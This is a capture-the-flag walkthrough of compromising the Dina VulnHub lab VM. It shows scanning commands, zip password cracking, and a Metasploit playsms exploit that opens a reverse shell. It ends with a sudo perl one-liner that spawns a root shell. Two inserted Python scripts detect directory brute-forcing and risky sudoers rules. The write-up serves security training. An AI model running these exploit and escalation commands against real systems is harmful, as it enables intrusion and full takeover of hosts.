Dina: 1.0.1 [VulnHub] — Walkthrough

Anu Shibin Joseph Raj
Nov 2 · 4 min read

Hi! 👋 Today we’ll be looking at how I pwned another beginner level VM called Dina: 1.0.1 created by Touhid Shaikh on Vulnhub.

Let’s go 🏃


As always, I’m starting with the netdiscover tool to find the IP of the remote machine:

root@kali:~# netdiscover
Finding the IP of the remote machine using the netdiscover tool

Now let’s see the services running on the box with the help of the nmap tool by performing an aggressive scan on all the ports of the remote machine:

root@kali:~# nmap -p- -A 192.168.0.15
Finding exposed services on the remote machine using the nmap tool

There is only an HTTP service running on port 80. Let’s check what’s inside it.

HTTP (80):

The HTML landing page didn’t give much information other than what Dina meant.

http://192.168.0.15/
Landing HTML page

The next thing I looked into was the robots.txt file:

http://192.168.0.15/robots.txt
Content of the robots.txt file

That’s a lot of directories! I checked each of them one by one and found some passwords in the page source of one of them!

http://192.168.0.15/nothing/
Passwords found in one of the files mentioned in the robots.txt file

Then I checked elsewhere inside the webpage but couldn’t find anything else. So I moved on to run a gobuster directory scan.

root@kali:~# gobuster dir -u http://192.168.0.15/ -w /usr/share/wordlists/dirb/big.txt
gobuster directory scan results

The gobuster scan result had one extra folder, called “secure”, which was not present in the robots.txt file.
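From the defender's side, a wordlist scan like this one shows up in the web server's access log as a single client requesting many distinct paths that almost all return 404. The following is an added example, not part of the original walkthrough: it flags such clients and lists the paths the scan actually found. The log lines are constructed (combined log format), and the client 192.168.0.20 and the thresholds are assumptions.

```python
import re
from collections import defaultdict

# client IP, request path and status code from a combined-format log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|HEAD|POST) (\S+) [^"]*" (\d{3}) ')

def build_sample_log():
    """Constructed access-log lines, not captured from the VM."""
    ts = "[01/Jan/2020:10:00:00 +0000]"
    words = ["admin", "backup", "cgi-bin", "config", "images", "login",
             "old", "private", "secure", "test", "tmp", "uploads"]
    lines = []
    for w in words:  # scanner walking a wordlist; only /secure exists
        status = 301 if w == "secure" else 404
        lines.append(f'192.168.0.14 - - {ts} "GET /{w} HTTP/1.1" {status} 300 "-" "-"')
    for p in ["/", "/robots.txt", "/nothing/"]:  # ordinary visitor
        lines.append(f'192.168.0.20 - - {ts} "GET {p} HTTP/1.1" 200 512 "-" "Mozilla/5.0"')
    return lines

def detect_enumeration(lines, min_paths=10, min_404_ratio=0.8):
    """Return clients whose traffic looks like directory brute-forcing."""
    stats = defaultdict(lambda: {"paths": set(), "total": 0, "not_found": 0, "hits": []})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path, status = m.group(1), m.group(2), int(m.group(3))
        s = stats[ip]
        s["paths"].add(path)
        s["total"] += 1
        if status == 404:
            s["not_found"] += 1
        elif status < 400:
            s["hits"].append(path)  # paths the scan found to exist
    report = {}
    for ip, s in stats.items():
        ratio = s["not_found"] / s["total"]
        if len(s["paths"]) >= min_paths and ratio >= min_404_ratio:
            report[ip] = {"requests": s["total"], "ratio_404": round(ratio, 2),
                          "discovered": sorted(s["hits"])}
    return report

if __name__ == "__main__":
    for ip, info in detect_enumeration(build_sample_log()).items():
        print(ip, info)
```

The "discovered" list is the part worth acting on: it names the unlisted paths that a scan confirmed to exist.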

There was a zip archive inside this folder. But it was password protected. So I used the zip2john tool to extract the password hash first. Then I used the john tool along with the passwords that we gathered from the webpage to crack the hash. This is how I did it:

root@kali:~# zip2john backup.zip > ziphash.txt
root@kali:~# cat ziphash.txt
root@kali:~# cat pass.txt
root@kali:~# john --wordlist=pass.txt ziphash.txt
Cracking the zip file’s password using John the Ripper

Yay! We got the password! On extracting the ZIP and reading the content of the file inside, we get another directory name which is present on the HTTP server.

Content of the ZIP archive

I headed to that webpage and got a login page. After brute-forcing all the passwords that we have, I got the correct one:

Username: touhid

Password: diana

Logged into the playSMS application deployed on the HTTP Server

There was a playSMS application deployed in it. So I checked in Metasploit if there were any exploits available for it. And there was one! So I used it to get a reverse shell.

root@kali:~# msfdb start
root@kali:~# msfconsole -q
msf5 > search playsms
msf5 > use exploit/multi/http/playsms_filename_exec
msf5 > set RHOSTS 192.168.0.15
msf5 > set RPORT 80
msf5 > set TARGETURI /SecreTSMSgatwayLogin
msf5 > set USERNAME touhid
msf5 > set PASSWORD diana
msf5 > set LHOST 192.168.0.14
msf5 > exploit
Exploiting the vulnerability in the PlaySMS application using Metasploit to get a reverse shell

Yay! We’re in 😃

Privilege escalation was even easier since perl had sudo execution rights with no password 😁

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo -l
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo /usr/bin/perl -e 'exec "/bin/bash";'
root@Dina:/var/www/SecreTSMSgatwayLogin# cd /root
root@Dina:~# cat flag.txt
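
The root cause of this escalation is a sudoers rule that lets a service account run an interpreter as root without a password. The following is an added example, not part of the original walkthrough: a small audit that flags NOPASSWD rules granting shell-capable programs. The sudoers content is a constructed sample (the walkthrough does not show the VM's actual file), and the list of programs is an illustrative assumption.

```python
import re

# Programs that can start a shell or run arbitrary commands (short, illustrative list).
SHELL_CAPABLE = {"perl", "python", "python3", "ruby", "bash", "sh", "vi", "vim", "awk", "find"}

# Constructed sample; the walkthrough does not show the VM's actual sudoers file.
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
www-data ALL=(ALL) NOPASSWD: /usr/bin/perl
backup ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/find
deploy ALL=(ALL) /usr/bin/systemctl restart app
"""

# user  host = (runas) command-list
RULE = re.compile(r"^(?P<who>\S+)\s+[^\s=]+\s*=\s*(?:\([^)]*\)\s*)?(?P<rest>.+)$")
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")

def audit_sudoers(text):
    """Return (line number, user, command) for risky NOPASSWD grants."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drops comments (and #include lines)
        if not line or line.startswith(SKIP):
            continue
        m = RULE.match(line)
        if not m:
            continue
        nopasswd = False
        for cmd in m.group("rest").split(","):
            cmd = cmd.strip()
            # A tag such as NOPASSWD: applies to this command and the ones after it.
            while (tag := re.match(r"^([A-Z_]+):\s*", cmd)):
                if tag.group(1) == "NOPASSWD":
                    nopasswd = True
                elif tag.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[tag.end():]
            binary = cmd.split()[0].rsplit("/", 1)[-1] if cmd else ""
            if nopasswd and (binary in SHELL_CAPABLE or cmd == "ALL"):
                findings.append((lineno, m.group("who"), cmd))
    return findings

if __name__ == "__main__":
    for lineno, who, cmd in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {lineno}: {who} may run {cmd} as root without a password")
```

Any rule it reports should either be removed or narrowed to a fixed command with fixed arguments that cannot spawn a shell.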

Hooray! 💃

The End 😄


Thanks for staying so far 😃

A clap 👏 would encourage me to write more like this 🤗. You may check my profile for my other walkthroughs. I write one every week.

You can follow me on Twitter 🐦 to get updates on all the machines that I pwn 😄.

Please mention your doubts, comments, and suggestions below.

See you in the next write-up 😄

Vale! 😃👋
